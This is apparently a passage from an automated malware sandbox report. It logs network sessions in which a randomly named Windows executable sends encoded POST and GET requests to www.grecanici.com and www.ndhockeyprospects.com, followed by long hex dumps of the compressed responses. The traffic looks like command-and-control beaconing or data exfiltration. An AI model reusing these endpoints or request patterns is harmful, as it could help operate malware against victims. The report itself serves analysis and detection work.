                                                                            Data Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf [TRUNCATED]
                                                                            Data Ascii: 3720UWG!^0\zTXz{~{2Cgi2-;?,W1Q==@}Aitg.o1q{~Iv<(7U_U5e+C E7`p)'->!RPgOi\jdTgL;c*t)kFxy\?=W`/`[x)/67EA2`+!rX\I/^LdCNb8Io78lw^2gD1bAxV:6b7/g_[zYpoo/&7uP"M_*w`'K(%s-?EOZ&H~;}}|@Jfo|E9V9*\pV_3~79do#+7oon:@M86?Nn}=pe7YXB2Gr]9>Nw?pfcqov D{bVBH8MC2&2S\~W|oO 9lQR|@1azCTnkj&KS`_@,JjOhed&y:7yyiINhYU_G~6`aa/e0SAti|$uy
                                                                            Jun 19, 2024 22:41:10.590851068 CEST224INData Raw: 0e 5f 12 82 a3 d0 99 8c cf 43 95 b8 7d b8 f0 6f d9 d2 6b c4 18 5d b7 b8 32 40 26 52 58 39 69 5d c2 5f a9 d4 c1 e1 67 03 49 e6 6f 9d ad f9 b8 25 93 d9 bf c4 f1 b3 56 d6 87 6f 7f 45 69 3d 53 0a 69 8c 72 58 1e 7b 2a db 55 1b 17 f7 09 25 90 8e 3c 93
                                                                            Data Ascii: _C}ok]2@&RX9i]_gIo%VoEi=SirX{*U%<RZ\PcU4>a<\$&9:R^_-Xmew}Zo:keI66X2"rcV-K3x<k7o
                                                                            Jun 19, 2024 22:41:10.590902090 CEST1236INData Raw: 53 2d f3 6b 8e fb a3 6c 37 17 67 57 93 8a 1a a7 54 b0 ce 51 04 5e 42 d5 bf 47 26 26 59 c8 c8 a5 8a 51 7b c7 ad 6a 49 60 5a 74 58 ed e5 a4 41 87 b4 46 4b 96 b3 d4 0c 0d 68 42 ef 9a 80 67 d0 30 72 81 1c 07 5e 54 c1 b0 2d 98 84 a9 31 9c cb 07 5b 6a
                                                                            Data Ascii: S-kl7gWTQ^BG&&YQ{jI`ZtXAFKhBg0r^T-1[jsZl?[v13(ymOTO:nh!dJ;.=\w |(]X>*h2f5RU/)z@kHTQQs}\M!z
                                                                            Jun 19, 2024 22:41:10.590951920 CEST1236INData Raw: e5 8a 41 a7 55 4a 61 fd 06 12 b1 32 c1 d2 09 9c 32 c1 d5 80 4b 41 82 7d 65 93 5c ea 8e a6 9b c2 48 cd 44 d2 2b c1 1a af 4d d8 62 7e 85 58 af df 19 33 9a 52 a6 e3 da 5d 49 3c 98 ab 0b d5 43 86 c3 2c 65 1c 27 4d 8a c9 f0 f5 a4 58 db b6 fa 38 96 6d
                                                                            Data Ascii: AUJa22KA}e\HD+Mb~X3R]I<C,e'MX8mt4?xI.s~MM}<LA</w;Lmc<l=j,wg6z9rX1p2T*$./S$9a]){,Md^&9#UvEUsV
                                                                            Jun 19, 2024 22:41:10.591001987 CEST1236INData Raw: 0d 27 8f aa 23 15 5a 6b 1a ae f3 d5 4e 1e 8a e9 0a d7 1a 87 b2 ca 73 72 50 f9 54 a4 d9 4e d7 a3 81 bc 61 bf 54 67 fa b0 ac 3f 85 b9 18 a8 74 32 59 26 22 83 4c a8 c0 47 09 87 54 09 8f a8 50 7b ec a0 c3 a1 90 8e 48 51 01 81 40 20 2a 24 70 f2 28 4a
                                                                            Data Ascii: '#ZkNsrPTNaTg?t2Y&"LGTP{HQ@ *$p(JD(%'p<'"M"ds+Vla9A6@z2%`'}a`Pjt3DQd'$8]aQ3+8&-"uCDp
                                                                            Jun 19, 2024 22:41:10.591053009 CEST1236INData Raw: 81 e4 98 10 12 10 1d 40 8b 1a 10 12 10 1d 05 c5 a2 61 40 48 00 34 00 2d e9 01 ea 3b 80 cb fa 94 82 fb da 2e 68 9b 5b e1 bf 5d ae b2 9e 6e 7c fd b4 d0 9a eb 22 1c 77 29 5f 62 d7 90 4b dc 90 fd ff b6 2d 64 ca 41 3a 28 e9 1f db f5 3b aa 85 51 f3 cd
                                                                            Data Ascii: @a@H4-;.h[]n|"w)_bK-dA:(;Q-pj@kBR;&]04Cu*.8N*IsehC[~`X,i n`X!18hG[~CkX,sR-i z,kV3ZC(4!fcBH@t-j@H
                                                                            Jun 19, 2024 22:41:10.591099977 CEST1236INData Raw: e4 31 20 04 0c d0 5e 90 2a 69 5f 04 50 09 24 2a 34 17 e4 09 da d7 a5 5b 71 5f 3a 47 e0 23 fb b0 af 07 c7 f3 ee f7 4d 1a 90 11 60 36 10 90 e4 31 20 05 02 02 92 3c 06 84 80 01 da 0b 52 25 ed 6b 85 3b f5 c6 a0 2c c8 1a cc a5 9b c8 ad 2c ef 8c c3 fd
                                                                            Data Ascii: 1 ^*i_P$*4[q_:G#M`61 <R%k;,,[tk9@2nP<BHhUdJ}}<5[.y>Vt>N81LaHt2H+31[g#>SFN1=SG$K(;13MbQw1H
                                                                            Jun 19, 2024 22:41:10.591150045 CEST1236INData Raw: 1a c8 35 02 ba 68 00 5a 74 ec 07 9b 09 d2 2b 4b 0b 0d d0 cb 4a b7 1a 48 b6 ef a2 60 fe 23 7e fd b7 c7 88 f6 cd bc 3d dc 7f f4 ed 4e d8 f7 38 fe 62 6d 87 de 6b eb b7 a1 37 6f f0 ac 73 8c e8 aa f5 a5 f4 2f 95 7b 2d fd d2 e5 e6 78 1a f4 cf 4d 82 37
                                                                            Data Ascii: 5hZt+KJH`#~=N8bmk7os/{-xM7x9FtoKg'!{#:t~<_^W9fOcobQ[3m>lYg+^|4<n=(c$00fJ1L=1L=%+F-dOJf})a0m!(S
                                                                            Jun 19, 2024 22:41:10.591200113 CEST1236INData Raw: 19 91 12 68 7a 49 20 b2 67 42 4a 44 04 cc 68 99 90 12 81 b6 80 11 35 20 a7 14 96 93 76 80 f5 b2 67 5b 4e 10 0b 4a 7b c0 c8 1a 10 e7 a7 cc 7a ae 99 6e 29 1d 74 9c e7 b6 a2 65 a0 e1 98 61 7a 1a 4d b4 90 d6 8b 1a e8 b6 52 a7 08 98 12 2c 23 ad 86 4c
                                                                            Data Ascii: hzI gBJDh5 vg[NJ{zn)teazMR,#Lh\$e)ML4ah --h!y>H<^}:0kzKS#k$D"%k3h-FMh)NQSrprzq=5t<+O7emBOfkl$m
                                                                            Jun 19, 2024 22:41:10.591253996 CEST1236INData Raw: 4e 64 f4 f6 a9 21 96 29 ab 82 2e 35 2c d1 f6 ff 0a 4b 15 17 86 1c 82 03 12 d9 a2 a0 86 23 de 7a 6f 85 a2 1e 89 e3 28 6b 73 94 25 75 4c 92 80 21 96 c1 7b 2f 16 cd d5 51 b3 72 46 12 f6 d7 09 dd fa 6e 41 51 0e 07 26 53 79 c3 71 cb 94 e5 88 0a 46 2d
                                                                            Data Ascii: Nd!).5,K#zo(ks%uL!{/QrFnAQ&SyqF-hl\,n6'xe=&F[ts\L%PT<<}T::D_1/o-[+knEe$pn0xR`S"V3&%*a6hl\|)y8'lzx,GJb4m
                                                                            Jun 19, 2024 22:41:10.596810102 CEST1236INData Raw: 8e fd ff 52 72 06 50 8c 66 69 43 b5 92 11 1d fb 42 02 f4 8a d0 49 12 1c 13 52 50 d8 2a bd 5c 35 12 11 1d 03 52 00 b4 8a 54 1f 99 c9 30 20 05 50 9d d2 af 57 1b 19 c9 b0 2f 67 2c 28 44 9f f4 cb d5 45 56 8a 8e 5d e9 07 4a d1 26 6d a8 26 32 a2 63 5f
                                                                            Data Ascii: RrPfiCBIRP*\5RT0 PW/g,(DEV]J&m&2c_!CdROatIvo(unwKLUwYd/?=Up-o-7;A9NAA7F@1Dx=9E"Kf5""<#RM/DLH


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            35192.168.2.44977935.214.235.206805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:12.502187967 CEST713OUTPOST /4iea/ HTTP/1.1
                                                                            Host: www.grecanici.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.grecanici.com
                                                                            Referer: http://www.grecanici.com/4iea/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 47 4e 6e 7a 74 59 4e 4f 73 6c 59 31 47 4d 67 52 4e 34 46 33 68 6a 4f 52 7a 4e 45 79 66 50 34 63 6c 69 74 47 75 71 48 2f 46 54 41 4a 35 52 63 48 43 33 67 44 49 49 66 30 71 38 54 4b 4b 36 67 38 45 76 4f 58 37 56 68 4d 6d 79 6c 48 2f 7a 64 61 62 6e 46 30 7a 7a 57 56 66 76 75 47 61 62 5a 66 6d 6a 74 6c 36 4c 53 6e 32 6c 45 39 30 31 36 2f 6d 4e 6b 4d 46 44 6e 55 59 73 2b 64 59 74 77 48 57 44 6e 6a 46 59 39 61 55 47 62 51 32 32 65 36 34 68 6e 76 74 54 31 6f 72 4c 6c 5a 79 46 69 35 6d 64 6b 63 6e 64 6b 31 4b 4e 75 7a 62 44 71 57 53 46 58 6a 6a 52 62 6d 76 4d 6f 4d 71 55 2b 38 66 59 74 56 78 5a 61 2f 53 6c 73 39 66 48 69 49 4f 4e 62 2f 6e 43 30 3d
                                                                            Data Ascii: tF1tk6=GNnztYNOslY1GMgRN4F3hjORzNEyfP4clitGuqH/FTAJ5RcHC3gDIIf0q8TKK6g8EvOX7VhMmylH/zdabnF0zzWVfvuGabZfmjtl6LSn2lE9016/mNkMFDnUYs+dYtwHWDnjFY9aUGbQ22e64hnvtT1orLlZyFi5mdkcndk1KNuzbDqWSFXjjRbmvMoMqU+8fYtVxZa/Sls9fHiIONb/nC0=
                                                                            Jun 19, 2024 22:41:13.108187914 CEST1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:13 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Httpd: 1
                                                                            Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                            X-Proxy-Cache-Info: DT:1
                                                                            Content-Encoding: br
                                                                            Data Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf [TRUNCATED]
                                                                            Data Ascii: 3720UWG!^0\zTXz{~{2Cgi2-;?,W1Q==@}Aitg.o1q{~Iv<(7U_U5e+C E7`p)'->!RPgOi\jdTgL;c*t)kFxy\?=W`/`[x)/67EA2`+!rX\I/^LdCNb8Io78lw^2gD1bAxV:6b7/g_[zYpoo/&7uP"M_*w`'K(%s-?EOZ&H~;}}|@Jfo|E9V9*\pV_3~79do#+7oon:@M86?Nn}=pe7YXB2Gr]9>Nw?pfcqov D{bVBH8MC2&2S\~W|oO 9lQR|@1azCTnkj&KS`_@,JjOhed&y:7yyiINhYU_G~6`aa/e0SAti|$uy
                                                                            Jun 19, 2024 22:41:13.108230114 CEST224INData Raw: 0e 5f 12 82 a3 d0 99 8c cf 43 95 b8 7d b8 f0 6f d9 d2 6b c4 18 5d b7 b8 32 40 26 52 58 39 69 5d c2 5f a9 d4 c1 e1 67 03 49 e6 6f 9d ad f9 b8 25 93 d9 bf c4 f1 b3 56 d6 87 6f 7f 45 69 3d 53 0a 69 8c 72 58 1e 7b 2a db 55 1b 17 f7 09 25 90 8e 3c 93
                                                                            Data Ascii: _C}ok]2@&RX9i]_gIo%VoEi=SirX{*U%<RZ\PcU4>a<\$&9:R^_-Xmew}Zo:keI66X2"rcV-K3x<k7o
                                                                            Jun 19, 2024 22:41:13.108247042 CEST1236INData Raw: 53 2d f3 6b 8e fb a3 6c 37 17 67 57 93 8a 1a a7 54 b0 ce 51 04 5e 42 d5 bf 47 26 26 59 c8 c8 a5 8a 51 7b c7 ad 6a 49 60 5a 74 58 ed e5 a4 41 87 b4 46 4b 96 b3 d4 0c 0d 68 42 ef 9a 80 67 d0 30 72 81 1c 07 5e 54 c1 b0 2d 98 84 a9 31 9c cb 07 5b 6a
                                                                            Data Ascii: S-kl7gWTQ^BG&&YQ{jI`ZtXAFKhBg0r^T-1[jsZl?[v13(ymOTO:nh!dJ;.=\w |(]X>*h2f5RU/)z@kHTQQs}\M!z
                                                                            Jun 19, 2024 22:41:13.108295918 CEST1236INData Raw: e5 8a 41 a7 55 4a 61 fd 06 12 b1 32 c1 d2 09 9c 32 c1 d5 80 4b 41 82 7d 65 93 5c ea 8e a6 9b c2 48 cd 44 d2 2b c1 1a af 4d d8 62 7e 85 58 af df 19 33 9a 52 a6 e3 da 5d 49 3c 98 ab 0b d5 43 86 c3 2c 65 1c 27 4d 8a c9 f0 f5 a4 58 db b6 fa 38 96 6d
                                                                            Data Ascii: AUJa22KA}e\HD+Mb~X3R]I<C,e'MX8mt4?xI.s~MM}<LA</w;Lmc<l=j,wg6z9rX1p2T*$./S$9a]){,Md^&9#UvEUsV
                                                                            Jun 19, 2024 22:41:13.108319998 CEST1236INData Raw: 0d 27 8f aa 23 15 5a 6b 1a ae f3 d5 4e 1e 8a e9 0a d7 1a 87 b2 ca 73 72 50 f9 54 a4 d9 4e d7 a3 81 bc 61 bf 54 67 fa b0 ac 3f 85 b9 18 a8 74 32 59 26 22 83 4c a8 c0 47 09 87 54 09 8f a8 50 7b ec a0 c3 a1 90 8e 48 51 01 81 40 20 2a 24 70 f2 28 4a
                                                                            Data Ascii: '#ZkNsrPTNaTg?t2Y&"LGTP{HQ@ *$p(JD(%'p<'"M"ds+Vla9A6@z2%`'}a`Pjt3DQd'$8]aQ3+8&-"uCDp
                                                                            Jun 19, 2024 22:41:13.108342886 CEST1236INData Raw: 81 e4 98 10 12 10 1d 40 8b 1a 10 12 10 1d 05 c5 a2 61 40 48 00 34 00 2d e9 01 ea 3b 80 cb fa 94 82 fb da 2e 68 9b 5b e1 bf 5d ae b2 9e 6e 7c fd b4 d0 9a eb 22 1c 77 29 5f 62 d7 90 4b dc 90 fd ff b6 2d 64 ca 41 3a 28 e9 1f db f5 3b aa 85 51 f3 cd
                                                                            Data Ascii: @a@H4-;.h[]n|"w)_bK-dA:(;Q-pj@kBR;&]04Cu*.8N*IsehC[~`X,i n`X!18hG[~CkX,sR-i z,kV3ZC(4!fcBH@t-j@H
                                                                            Jun 19, 2024 22:41:13.108360052 CEST1236INData Raw: e4 31 20 04 0c d0 5e 90 2a 69 5f 04 50 09 24 2a 34 17 e4 09 da d7 a5 5b 71 5f 3a 47 e0 23 fb b0 af 07 c7 f3 ee f7 4d 1a 90 11 60 36 10 90 e4 31 20 05 02 02 92 3c 06 84 80 01 da 0b 52 25 ed 6b 85 3b f5 c6 a0 2c c8 1a cc a5 9b c8 ad 2c ef 8c c3 fd
                                                                            Data Ascii: 1 ^*i_P$*4[q_:G#M`61 <R%k;,,[tk9@2nP<BHhUdJ}}<5[.y>Vt>N81LaHt2H+31[g#>SFN1=SG$K(;13MbQw1H
                                                                            Jun 19, 2024 22:41:13.108392954 CEST552INData Raw: 1a c8 35 02 ba 68 00 5a 74 ec 07 9b 09 d2 2b 4b 0b 0d d0 cb 4a b7 1a 48 b6 ef a2 60 fe 23 7e fd b7 c7 88 f6 cd bc 3d dc 7f f4 ed 4e d8 f7 38 fe 62 6d 87 de 6b eb b7 a1 37 6f f0 ac 73 8c e8 aa f5 a5 f4 2f 95 7b 2d fd d2 e5 e6 78 1a f4 cf 4d 82 37
                                                                            Data Ascii: 5hZt+KJH`#~=N8bmk7os/{-xM7x9FtoKg'!{#:t~<_^W9fOcobQ[3m>lYg+^|4<n=(c$00fJ1L=1L=%+F-dOJf})a0m!(S
                                                                            Jun 19, 2024 22:41:13.108407974 CEST1236INData Raw: b0 98 d6 4f 9a f8 e0 98 61 5a 4f c0 94 64 99 f8 d4 90 29 a0 83 b4 5c d2 c0 47 c6 55 01 fb 7d e1 c2 7f fd be 71 5d c0 ec f1 6d 0f 6b 6c 96 24 7d 27 45 ba 04 c3 1f 21 7a 26 de 4b a7 38 2c 09 6d 61 58 31 ea 01 6f 67 ef 2d ae eb e6 3d a7 f7 e5 b8 40
                                                                            Data Ascii: OaZOd)\GU}q]mkl$}'E!z&K8,maX1og-=@z:azuUt_b9\)%Qy2#W%M-vu'9%+}D?}z?FS}yNoBp{&<kW
                                                                            Jun 19, 2024 22:41:13.108457088 CEST224INData Raw: 84 93 a7 e8 92 59 fb ea 4d 63 d0 c0 c9 53 f4 9e b3 ac 7d f5 14 e8 92 70 f2 14 1d 59 fb 52 d2 40 03 4d f2 4c a8 05 22 a7 25 0b 23 7b 06 d4 82 06 9a a2 33 5a 06 d4 82 a6 38 59 8a 8e a8 7d f5 94 45 97 83 93 a3 e8 7a d9 b3 ab 9e 00 5d 10 4e 9e a2 23
                                                                            Data Ascii: YMcS}pYR@ML"%#{3Z8Y}Ez]N#k_XSq7G2Mxhc3$7Hk:o1H&t5kL&-hKa8i/kM1\=b^{}L\3{m}Qr}TD7hC!k
                                                                            Jun 19, 2024 22:41:13.113504887 CEST1236INData Raw: 4b c4 10 e2 21 24 cd 88 e9 22 84 6c ba 49 60 c9 9a 09 d3 44 44 c0 35 4a 26 4c 13 81 96 80 4b b4 01 d3 a5 30 9c b4 02 8c 97 35 db a6 83 18 50 5a 03 2e d9 76 8c 62 dc e4 d3 8d 1d 95 ae af d6 33 7d ff 9f 31 76 82 f5 2c 4c fe 43 cc 31 7c e0 fb c7 7f
                                                                            Data Ascii: K!$"lI`DD5J&LK05PZ.vb3}1v,LC1|Pza=rKL<x`i*I$k9m u)f$Zl'B8%K?;9rW+W'<Nn{uq#es!=RMMbl-.qmupW


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            36192.168.2.449780162.241.253.174801860C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:13.738082886 CEST523OUTGET /nce6/?QTth=cdSXMBmhjDz&gheP1DX=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.ndhockeyprospects.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Jun 19, 2024 22:41:14.959733009 CEST655INHTTP/1.1 301 Moved Permanently
                                                                            Date: Wed, 19 Jun 2024 20:41:14 GMT
                                                                            Server: nginx/1.21.6
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 0
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            X-Redirect-By: WordPress
                                                                            Content-Security-Policy: upgrade-insecure-requests
                                                                            Location: http://ndhockeyprospects.com/nce6/?QTth=cdSXMBmhjDz&gheP1DX=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY=
                                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                            X-Endurance-Cache-Level: 2
                                                                            X-nginx-cache: WordPress
                                                                            X-Server-Cache: true
                                                                            X-Proxy-Cache: MISS


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            37192.168.2.44978135.214.235.206805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:15.031759024 CEST10795OUTPOST /4iea/ HTTP/1.1
                                                                            Host: www.grecanici.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.grecanici.com
                                                                            Referer: http://www.grecanici.com/4iea/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 47 4e 6e 7a 74 59 4e 4f 73 6c 59 31 47 4d 67 52 4e 34 46 33 68 6a 4f 52 7a 4e 45 79 66 50 34 63 6c 69 74 47 75 71 48 2f 46 56 59 4a 35 48 6f 48 44 55 59 44 4a 49 66 30 6a 63 54 4c 4b 36 67 78 45 76 57 62 37 56 74 32 6d 77 64 48 2b 52 56 61 4b 6c 39 30 35 7a 57 56 58 50 75 44 65 62 5a 47 6d 6e 4a 66 36 4c 43 6e 32 6c 45 39 30 7a 2b 2f 68 63 6b 4d 4b 6a 6e 58 49 4d 2b 72 4a 39 77 6a 57 43 50 7a 46 59 78 73 54 32 37 51 32 57 75 36 72 6a 2f 76 76 7a 31 71 2f 72 6b 65 79 46 75 6d 6d 64 34 68 6e 64 52 69 4b 4b 4f 7a 5a 6c 58 50 4a 58 6a 43 79 42 4c 69 33 4f 63 59 6b 33 79 41 48 34 78 69 67 38 4f 2b 4e 45 6c 55 63 33 53 41 4b 34 7a 4d 39 32 46 43 4b 51 48 36 46 67 75 64 57 56 58 6b 65 48 64 63 33 79 55 31 52 74 50 6f 6b 51 68 39 5a 71 36 6c 75 66 6c 4f 42 52 6b 4a 62 71 74 59 67 50 51 53 68 51 33 74 36 44 65 72 7a 55 72 6f 2f 54 31 68 30 57 62 67 58 43 77 62 50 78 42 6f 74 48 39 6d 4f 35 77 73 45 39 41 38 36 45 75 37 78 78 41 53 53 39 32 65 76 6e 61 37 6f 46 78 54 53 55 41 7a 58 4f 2f [TRUNCATED]
                                                                            Data Ascii: tF1tk6=GNnztYNOslY1GMgRN4F3hjORzNEyfP4clitGuqH/FVYJ5HoHDUYDJIf0jcTLK6gxEvWb7Vt2mwdH+RVaKl905zWVXPuDebZGmnJf6LCn2lE90z+/hckMKjnXIM+rJ9wjWCPzFYxsT27Q2Wu6rj/vvz1q/rkeyFummd4hndRiKKOzZlXPJXjCyBLi3OcYk3yAH4xig8O+NElUc3SAK4zM92FCKQH6FgudWVXkeHdc3yU1RtPokQh9Zq6luflOBRkJbqtYgPQShQ3t6DerzUro/T1h0WbgXCwbPxBotH9mO5wsE9A86Eu7xxASS92evna7oFxTSUAzXO/Px0BXcSp1fYXTPlzEzvd9IMY1fwHcHeFod1SPf+Cr0ye/XZpz8Tl9stX6pCGGyhvIVgtdz6bhi1Tv3FJ4HXm+xQHEPWCk0gVJqtzo0RrjoUvbwqRowqH47LDCO34SbAgeSA0eraE6WPQ+IRRaO3GfQvyS6W5Yy3TKfHPYuAAKVDB9zIQJAFXJ6wvNKYQNqql/J/8S3oGHSOiJ9CF4PA9g6fAe4jCDTmM5VGDwdqMAR70QKocwr+ps2briVlL453x7eQvt/MDgyshrXVOkeGI+XvX5inOa2Qp1s8OwBFdXkWjFky1s+C60wwuI0ivqJyFJrCBPbOP7Yp8Wqp9PpmH+rKPlUDK1a7E3+LDSrsKQXLQ4f3SrdfWUXDFv7R25l0Vs7IJ9M/zcNrg5eJZKtA0W0JiRnKf54oIFyJ3NzPRcyqz5ctb9y7v9yFr/wNzPkGyvIzZNRkrDSUu276qchqyhgr1lovo4V5CH2dE4zUMTTc5b+BcPx+4iSHnMxUwDX+TFTcno9WQw2RBCXUXzktA88Q+hYAuRrS5vJZzgNbq3kKoAfr4NM64MBG9l2f51mjV5CrH+cbkgctHM2Juj8DuM7ZxZQh3AM0OWjEZJiuvTESeKc6wXiIowo3SfF250zw5oyRXI29W+6u+fj2PCdeQr6AKfUGsTe/1sX [TRUNCATED]
                                                                            Jun 19, 2024 22:41:15.718842030 CEST1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:15 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Httpd: 1
                                                                            Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                            X-Proxy-Cache-Info: DT:1
                                                                            Content-Encoding: br
                                                                            Data Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 